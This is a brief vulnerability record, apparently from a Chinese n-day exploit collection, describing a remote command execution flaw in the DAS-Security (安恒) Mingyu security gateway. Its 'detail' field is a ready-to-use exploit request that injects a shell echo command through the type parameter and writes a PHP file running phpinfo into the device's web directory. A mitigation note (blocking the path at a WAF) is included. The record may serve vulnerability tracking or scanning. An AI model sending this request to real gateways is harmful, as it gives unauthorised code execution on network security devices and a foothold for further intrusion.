vendor = "安恒"
name = "安恒明御安全网关远程命令执行漏洞"
type = "未知"
version = "未知"
path = "/webui/"
detail = "GET /webui/?g=aaa_portal_auth_config_reset&type=echo '<?php echo \"assdwdmpidmsbzoabahpjhnokiduw\"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "nday"
